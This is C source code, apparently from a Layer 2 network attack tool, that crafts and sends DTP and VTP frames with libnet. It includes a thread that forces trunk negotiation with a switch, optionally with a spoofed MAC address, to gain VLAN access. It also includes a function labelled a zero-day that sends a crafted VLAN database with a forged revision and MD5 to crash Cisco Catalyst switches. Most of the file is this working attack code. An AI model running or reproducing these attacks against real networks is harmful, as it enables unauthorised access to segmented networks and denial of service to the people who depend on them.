{
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t dtp_len, sent;
    struct dtp_data *dtp_data;
    u_int8_t *dtp_packet, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x04 };
    dlist_t *p;
    struct interface_data *iface_data;
    struct interface_data *iface_data2;

    dtp_data = attacks->data;

    /* SNAP/OUI prefix + domain + 26 bytes of fixed TLV overhead. */
    dtp_len = sizeof(cisco_data)+dtp_data->dom_len+26;
    dtp_packet = calloc(1,dtp_len);
    if (dtp_packet == NULL)
    {
        thread_error("dtp_send calloc error",errno);
        return -1;
    }

    aux = dtp_packet;
    memcpy(dtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);

    /* DTP version byte. The single-byte writes with interleaved skips
     * presumably build 2-byte big-endian type/length fields whose high
     * bytes stay zero from calloc — confirm against the DTP layout. */
    *aux = dtp_data->version;
    aux++;
    aux++;
    /* Domain TLV: type, length = dom_len+5, then the domain bytes. */
    *aux = DTP_TYPE_DOMAIN;
    aux++;
    aux++;
    *aux = dtp_data->dom_len+5;
    aux++;
    memcpy(aux,dtp_data->domain,dtp_data->dom_len);
    aux+=dtp_data->dom_len;
    aux++;
    aux++;
    /* Status TLV: type, length 5, status value. */
    *aux = DTP_TYPE_STATUS;
    aux++;
    aux++;
    *aux = 0x05;
    aux++;
    *aux = dtp_data->status;
    aux++;
    aux++;
    /* Type TLV: type, length 5, trunk-type value. */
    *aux = DTP_TYPE_TYPE;
    aux++;
    aux++;
    *aux = 0x05;
    aux++;
    *aux = dtp_data->type;
    aux++;
    aux++;
    /* Neighbor TLV: type, length 10, 6-byte MAC address. */
    *aux = DTP_TYPE_NEIGHBOR;
    aux++;
    aux++;
    *aux = 0x0a;
    aux++;
    memcpy(aux,dtp_data->neighbor,ETHER_ADDR_LEN);

    /* Send the frame on every interface assigned to the attack. */
    for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p))
    {
        iface_data = (struct interface_data *) dlist_data(p);
        lhandler = iface_data->libnet_handler;

        t = libnet_build_802_2(
                0xaa,            /* DSAP */
                0xaa,            /* SSAP */
                0x03,            /* control */
                dtp_packet,      /* payload */
                dtp_len,         /* payload size */
                lhandler,        /* libnet handle */
                0);              /* libnet id */
        if (t == -1)
        {
            thread_libnet_error("Can't build ethernet header",lhandler);
            libnet_clear_packet(lhandler);
            free(dtp_packet);
            return -1;
        }

        t = libnet_build_802_3(
                dtp_data->mac_dest,               /* ethernet destination */
                (attacks->mac_spoofing) ?
                    dtp_data->mac_source : iface_data->etheraddr, /* ethernet source */
                LIBNET_802_2_H + dtp_len,         /* frame size */
                NULL,                             /* payload */
                0,                                /* payload size */
                lhandler,                         /* libnet handle */
                0);                               /* libnet id */
        if (t == -1)
        {
            thread_libnet_error("Can't build ethernet header",lhandler);
            libnet_clear_packet(lhandler);
            free(dtp_packet);
            return -1;
        }

        /*
         * Write it to the wire.
         * NOTE(review): 'sent' is unsigned; the == -1 comparison relies
         * on the implicit conversion of -1 (it does work, but an int
         * would be the natural type for libnet_write's result).
         */
        sent = libnet_write(lhandler);
        if (sent == -1)
        {
            thread_libnet_error("libnet_write error", lhandler);
            libnet_clear_packet(lhandler);
            free(dtp_packet);
            return -1;
        }

        libnet_clear_packet(lhandler);

        /* Bump the global and per-interface outbound counters. */
        protocols[PROTO_DTP].packets_out++;
        iface_data2 = interfaces_get_struct(iface_data->ifname);
        iface_data2->packets_out[PROTO_DTP]++;
    }

    free(dtp_packet);

    return 0;
}
/*
 * Non-DoS attack thread: negotiate a trunk with the peer switch.
 *
 * Sends a few initial DTP frames, spawns dtp_send_negotiate as a helper
 * thread, then keeps listening for the peer's DTP packets and mirrors its
 * trunking status (answering TRUNK or ACCESS with DESIRABLE) until the
 * attack is stopped.
 *
 * NOTE(review): attack_th.finished is locked here and presumably released
 * by dtp_th_nondos_do_trunk_exit() — confirm against the exit helper.
 */
void dtp_th_nondos_do_trunk( void *arg )
{
    struct attacks *attacks = (struct attacks *)arg;
    struct dtp_data *dtp_data, dtp_data_learned;
    struct pcap_pkthdr header;
    struct pcap_data pcap_aux;
    struct libnet_802_3_hdr *ether;
    struct timeval now;
    u_int8_t *packet;
    sigset_t mask;

    pthread_mutex_lock(&attacks->attack_th.finished);

    pthread_detach(pthread_self());

    /* Block every signal in this thread; signals are handled elsewhere. */
    sigfillset(&mask);

    if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
    {
        thread_error("dtp_nondos_do_trunk pthread_sigmask()",errno);
        dtp_th_nondos_do_trunk_exit(attacks);
    }

    dtp_data = attacks->data;

    gettimeofday(&now,NULL);

    header.ts.tv_sec = now.tv_sec;
    header.ts.tv_usec = now.tv_usec;

    /* If you want to test the NULL domain just set the defaults DTP packet values */
    /* and comment the following lines. (and recompile)*/
    /* From here...
    if (dtp_learn_packet(ALL_INTS,&attacks->attack_th.stop, &dtp_data_learned, &header) < 0)
        dtp_th_nondos_do_trunk_exit(attacks);

    memcpy(dtp_data->mac_dest, dtp_data_learned.mac_dest,6);
    memcpy(dtp_data->domain,(void *)dtp_data_learned.domain, dtp_data_learned.dom_len);
    dtp_data->version = dtp_data_learned.version;
    dtp_data->dom_len = dtp_data_learned.dom_len;
    dtp_data->status = dtp_data_learned.status;
    dtp_data->type = dtp_data_learned.type;
    ... to here. */

    packet = (u_int8_t *)calloc( 1, SNAPLEN );

    if ( ! packet )
        dtp_th_nondos_do_trunk_exit(attacks);

    /* Announce ourselves: three sends roughly one second apart. */
    dtp_send(attacks);
    thread_usleep(999999);

    dtp_send(attacks);
    thread_usleep(999999);

    if ( !attacks->attack_th.stop )
    {
        dtp_send(attacks);

        if ( ! thread_create( &attacks->helper_th, &dtp_send_negotiate, attacks ) )
        {
            /* Listen for the peer's DTP frames until told to stop. */
            while ( ! attacks->attack_th.stop )
            {
                interfaces_get_packet( attacks->used_ints, NULL,
                                       &attacks->attack_th.stop,
                                       &header, packet, PROTO_DTP, NO_TIMEOUT );

                if ( ! attacks->attack_th.stop )
                {
                    ether = (struct libnet_802_3_hdr *) packet;

                    if (!memcmp(dtp_data->mac_source,ether->_802_3_shost,6) )
                        continue; /* Oops!! Its our packet... */

                    pcap_aux.header = &header;
                    pcap_aux.packet = packet;

                    if ( dtp_load_values( &pcap_aux, &dtp_data_learned ) < 0)
                        continue;

                    /* Mirror the peer: answer its mode with DESIRABLE so the
                       negotiation converges on a trunk. */
                    switch( dtp_data_learned.status & 0xF0 )
                    {
                        case DTP_TRUNK:
                            dtp_data->status = (DTP_TRUNK | DTP_DESIRABLE);
                        break;
                        case DTP_ACCESS:
                            dtp_data->status = (DTP_ACCESS | DTP_DESIRABLE);
                        break;
                    }
                }
            }
        }
        else
            write_log( 0, "dtp_th_nondos_do_trunk thread_create error\n" );
    }

    free(packet);

    dtp_th_nondos_do_trunk_exit(attacks);
}
/* * Zero day crashing Catalyst!! */ void vtp_th_dos_crash(void *arg) { struct attacks *attacks=NULL; struct vtp_data *vtp_data, vtp_data_learned; struct pcap_pkthdr header; struct pcap_data pcap_aux; struct libnet_802_3_hdr *ether; struct timeval now; u_int8_t *packet=NULL, *cursor; sigset_t mask; /* Cisco vlans for crashing */ u_int8_t vlan_cisco[]={ 0x75, 0x00, 0x01, 0x07, 0x20, 0x00, 0x02, 0x0c, 0x03, 0xea, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8a, 0x66, 0x64, 0x64, 0x69, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x01, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x28, 0x00, 0x03, 0x12, 0x03, 0xeb, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8b, 0x74, 0x6f, 0x6b, 0x65, 0x6e, 0x2d, 0x72, 0x69, 0x6e, 0x67, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x24, 0x00, 0x04, 0x0f, 0x03, 0xec, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8c, 0x66, 0x64, 0x64, 0x69, 0x6e, 0x65, 0x74, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 0x02, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x01, 0x24, 0x00, 0x05, 0x0d, 0x03, 0xed, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8d, 0x74, 0x72, 0x6e, 0x65, 0x74, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x20 }; sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("vtp_th_dos_del_all pthread_sigmask()",errno); vtp_th_dos_crash_exit(attacks); } attacks = arg; vtp_data = attacks->data; gettimeofday(&now, NULL); header.ts.tv_sec = now.tv_sec; header.ts.tv_usec = now.tv_usec; if ((packet = calloc(1, SNAPLEN)) == NULL) vtp_th_dos_crash_exit(attacks); while (!attacks->attack_th.stop) { memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data)); interfaces_get_packet(attacks->used_ints, NULL, 
&attacks->attack_th.stop, &header, packet, PROTO_VTP, NO_TIMEOUT); if (attacks->attack_th.stop) break; cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H); ether = (struct libnet_802_3_hdr *) packet; if (!memcmp(vtp_data->mac_source,ether->_802_3_shost,6) ) continue; /* Oops!! Its our packet... */ pcap_aux.header = &header; pcap_aux.packet = packet; if (vtp_load_values(&pcap_aux, &vtp_data_learned) < 0) continue; if ((vtp_data_learned.code != VTP_SUMM_ADVERT) && (vtp_data_learned.code != VTP_SUBSET_ADVERT) ) continue; if (vtp_generate_md5( NULL, vtp_data->updater, (vtp_data_learned.revision+1), vtp_data_learned.domain, vtp_data_learned.dom_len, vlan_cisco, sizeof(vlan_cisco), vtp_data->md5, vtp_data_learned.version) < 0) break; vtp_data->code = VTP_SUMM_ADVERT; vtp_data->followers = 1; if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE) { vtp_data->dom_len = VTP_DOMAIN_SIZE; memcpy(vtp_data->domain,vtp_data_learned.domain,VTP_DOMAIN_SIZE); } else { vtp_data->dom_len = vtp_data_learned.dom_len; memcpy(vtp_data->domain,vtp_data_learned.domain,vtp_data_learned.dom_len); } vtp_data->revision = vtp_data_learned.revision+1; usleep(200000); if (vtp_send(attacks)< 0) break; usleep(200000); vtp_data->code = VTP_SUBSET_ADVERT; vtp_data->seq = 1; vtp_data->vlan_info = vlan_cisco; vtp_data->vlans_len = sizeof(vlan_cisco); vtp_send(attacks); break; } free(packet); vtp_th_dos_crash_exit(attacks); }
int8_t vtp_add_vlan(u_int16_t vlan, char *vlan_name, u_int8_t **vlans_ptr, u_int16_t *vlen) { struct vlan_info *vlan_info, *vlan_info2; u_int8_t *cursor, *cursor2, *aux, *vlans, *last_init=NULL; u_int16_t len=0, vlans_len, last_id=0, last_len=0; vlans = *vlans_ptr; vlans_len = *vlen; aux = (u_int8_t *)calloc(1,vlans_len+sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name))); if (aux == NULL) { thread_error("vtp_add_vlan calloc()", errno); return -1; } cursor = vlans; while( (cursor+sizeof(struct vlan_info)) < (vlans+vlans_len)) { vlan_info = (struct vlan_info *) cursor; if ((cursor+vlan_info->len) > (vlans+vlans_len)) break; if ( (ntohs(last_id)<= vlan) && (ntohs(vlan_info->id)>= vlan) ) { if (last_init == NULL) /* First VLAN */ { vlan_info = (struct vlan_info *) aux; vlan_info->len = sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name)); vlan_info->status = 0x00; vlan_info->type = VLAN_TYPE_ETHERNET; vlan_info->name_len = strlen(vlan_name); vlan_info->id = htons(vlan); vlan_info->mtu = htons(1500); vlan_info->dot10 = htonl(vlan+VTP_DOT10_BASE); memcpy((void *)(vlan_info+1),vlan_name,strlen(vlan_name)); /* Now copy all the rest of vlans...*/ memcpy((void *)(aux+vlan_info->len),vlans,vlans_len); *vlen = vlan_info->len+vlans_len; *vlans_ptr = aux; return 0; } cursor+=vlan_info->len; len = vlans_len-vlan_info->len; if ( (cursor+sizeof(struct vlan_info)) < (vlans+vlans_len)) { cursor2 = (u_int8_t *)vlan_info; vlan_info2 = (struct vlan_info *) cursor2; if ((cursor2+vlan_info2->len) > (vlans+vlans_len)) { /* Oversized!! */ write_log(0," Oversized vlan length. 
Aborting...\n"); free(aux); return -1; } memcpy(aux,(void *)*vlans_ptr,( (last_init+last_len) - vlans )); vlan_info = (struct vlan_info *) (aux+ ((last_init+last_len) - vlans)); vlan_info->len = sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name)); vlan_info->status = 0x00; vlan_info->type = VLAN_TYPE_ETHERNET; vlan_info->name_len = strlen(vlan_name); vlan_info->id = htons(vlan); vlan_info->mtu = htons(1500); vlan_info->dot10 = htonl(vlan+VTP_DOT10_BASE); memcpy((void *)(vlan_info+1),vlan_name,strlen(vlan_name)); cursor=(u_int8_t *)vlan_info; cursor+=vlan_info->len; memcpy(cursor, cursor2, (vlans+vlans_len)-cursor2 ); *vlen = vlan_info->len+vlans_len; *vlans_ptr = aux; return 0; } else /* Last VLAN... */ { return 0; } break; } /* We got it */ last_len = vlan_info->len; last_id = vlan_info->id; last_init = (u_int8_t *)vlan_info; cursor+=vlan_info->len; } /* Last VLAN...*/ memcpy((void *)aux,(void *)*vlans_ptr,vlans_len); vlan_info = (struct vlan_info *)(aux+vlans_len); vlan_info->len = sizeof(struct vlan_info)+VLAN_ALIGNED_LEN(strlen(vlan_name)); vlan_info->status = 0x00; vlan_info->type = VLAN_TYPE_ETHERNET; vlan_info->name_len = strlen(vlan_name); vlan_info->id = htons(vlan); vlan_info->mtu = htons(1500); vlan_info->dot10 = htonl(vlan+VTP_DOT10_BASE); memcpy((void *)(vlan_info+1),vlan_name,strlen(vlan_name)); *vlen = vlan_info->len+vlans_len; *vlans_ptr = aux; return 0; }
/*
 * Build and send the VTP message selected by vtp_data->code (summary
 * advert, subset advert, request or join) once on every interface the
 * attack is using.
 *
 * The packet is calloc()'d, so any field not explicitly written below is
 * transmitted as zero.
 *
 * Returns 0 on success, -1 on calloc/libnet failure (packet buffer and
 * libnet state are released on every error path).
 */
int8_t vtp_send(struct attacks *attacks)
{
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_data *vtp_data;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_subset;
    struct vtp_request *vtp_request;
    struct vtp_join *vtp_join;
    u_int8_t *vtp_packet, *aux;
    /* SNAP header: Cisco OUI 00:00:0c, protocol id 0x2003 (VTP). */
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    dlist_t *p;
    struct interface_data *iface_data;
    struct interface_data *iface_data2;

    vtp_data = attacks->data;

    /* Payload size depends on the message type being sent. */
    switch(vtp_data->code)
    {
        case VTP_SUMM_ADVERT:
            vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
        break;
        case VTP_SUBSET_ADVERT:
            vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset)+vtp_data->vlans_len;
        break;
        case VTP_REQUEST:
            vtp_len = sizeof(cisco_data)+38;
        break;
        case VTP_JOIN:
            vtp_len = sizeof(cisco_data)+40+126;
        break;
        default:
            vtp_len = sizeof(cisco_data)+30;
        break;
    }

    vtp_packet = calloc(1,vtp_len);

    if (vtp_packet == NULL) {
        thread_error("vtp_send calloc error",errno);
        return -1;
    }

    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);

    /* Overlay the type-specific header on the payload and fill it in.
       The domain name is always clamped to VTP_DOMAIN_SIZE. */
    switch(vtp_data->code)
    {
        case VTP_SUMM_ADVERT:
            vtp_summ = (struct vtp_summary *)aux;
            vtp_summ->version = vtp_data->version;
            vtp_summ->code = vtp_data->code;
            vtp_summ->followers = vtp_data->followers;
            if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
            {
                vtp_summ->dom_len = VTP_DOMAIN_SIZE;
                memcpy(vtp_summ->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
            }
            else
            {
                vtp_summ->dom_len = vtp_data->dom_len;
                memcpy(vtp_summ->domain,vtp_data->domain,vtp_data->dom_len);
            }
            vtp_summ->revision = htonl(vtp_data->revision);
            vtp_summ->updater = htonl(vtp_data->updater);
            memcpy(vtp_summ->timestamp,vtp_data->timestamp,VTP_TIMESTAMP_SIZE);
            memcpy(vtp_summ->md5,vtp_data->md5,16);
        break;

        case VTP_SUBSET_ADVERT:
            vtp_subset = (struct vtp_subset *)aux;
            vtp_subset->version = vtp_data->version;
            vtp_subset->code = vtp_data->code;
            vtp_subset->seq = vtp_data->seq;
            if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
            {
                vtp_subset->dom_len = VTP_DOMAIN_SIZE;
                memcpy(vtp_subset->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
            }
            else
            {
                vtp_subset->dom_len = vtp_data->dom_len;
                memcpy(vtp_subset->domain,vtp_data->domain,vtp_data->dom_len);
            }
            vtp_subset->revision = htonl(vtp_data->revision);
            /* VLAN database records follow the fixed subset header. */
            if (vtp_data->vlans_len)
                memcpy((vtp_subset+1),vtp_data->vlan_info,vtp_data->vlans_len);
        break;

        case VTP_REQUEST:
            vtp_request = (struct vtp_request *)aux;
            vtp_request->version = vtp_data->version;
            vtp_request->code = vtp_data->code;
            vtp_request->reserved = 0;
            if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
            {
                vtp_request->dom_len = VTP_DOMAIN_SIZE;
                memcpy(vtp_request->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
            }
            else
            {
                vtp_request->dom_len = vtp_data->dom_len;
                memcpy(vtp_request->domain,vtp_data->domain,vtp_data->dom_len);
            }
            vtp_request->start_val = htons(vtp_data->start_val);
        break;

        case VTP_JOIN:
            vtp_join = (struct vtp_join *)aux;
            vtp_join->version = vtp_data->version;
            vtp_join->code = vtp_data->code;
            vtp_join->maybe_reserved = 0;
            if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
            {
                vtp_join->dom_len = VTP_DOMAIN_SIZE;
                memcpy(vtp_join->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
            }
            else
            {
                vtp_join->dom_len = vtp_data->dom_len;
                memcpy(vtp_join->domain,vtp_data->domain,vtp_data->dom_len);
            }
            /* NOTE(review): 0x3ef = VLAN 1007 and the 0x40 marker byte are
               taken as-is from the original — semantics unconfirmed. */
            vtp_join->vlan = htonl(0x000003ef);
            vtp_join->unknown[0] = 0x40;
        break;

        default:
            /* Unknown code: emit just version + code, rest zeroed. */
            aux[0]=vtp_data->version;
            aux[1]=vtp_data->code;
        break;
    }

    /* Send the payload out of each in-use interface. */
    for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p))
    {
        iface_data = (struct interface_data *) dlist_data(p);
        lhandler = iface_data->libnet_handler;

        t = libnet_build_802_2(
                0xaa,            /* DSAP */
                0xaa,            /* SSAP */
                0x03,            /* control */
                vtp_packet,      /* payload */
                vtp_len,         /* payload size */
                lhandler,        /* libnet handle */
                0);              /* libnet id */

        if (t == -1)
        {
            thread_libnet_error("Can't build ethernet header",lhandler);
            libnet_clear_packet(lhandler);
            free(vtp_packet);
            return -1;
        }

        t = libnet_build_802_3(
                vtp_data->mac_dest,                    /* ethernet destination */
                (attacks->mac_spoofing) ?
                    vtp_data->mac_source : iface_data->etheraddr,
                                                       /* ethernet source */
                LIBNET_802_2_H + vtp_len,              /* frame size */
                NULL,                                  /* payload */
                0,                                     /* payload size */
                lhandler,                              /* libnet handle */
                0);                                    /* libnet id */

        if (t == -1)
        {
            thread_libnet_error("Can't build ethernet header",lhandler);
            libnet_clear_packet(lhandler);
            free(vtp_packet);
            return -1;
        }

        /*
         * Write it to the wire.
         */
        sent = libnet_write(lhandler);

        if (sent == -1) /* libnet_write returns int; the unsigned compare
                           still matches -1 after conversion */
        {
            thread_libnet_error("libnet_write error", lhandler);
            libnet_clear_packet(lhandler);
            free(vtp_packet);
            return -1;
        }

        libnet_clear_packet(lhandler);
        protocols[PROTO_VTP].packets_out++;

        /* Per-interface statistics. */
        iface_data2 = interfaces_get_struct(iface_data->ifname);
        iface_data2->packets_out[PROTO_VTP]++;
    }

    free(vtp_packet);

    return 0;
}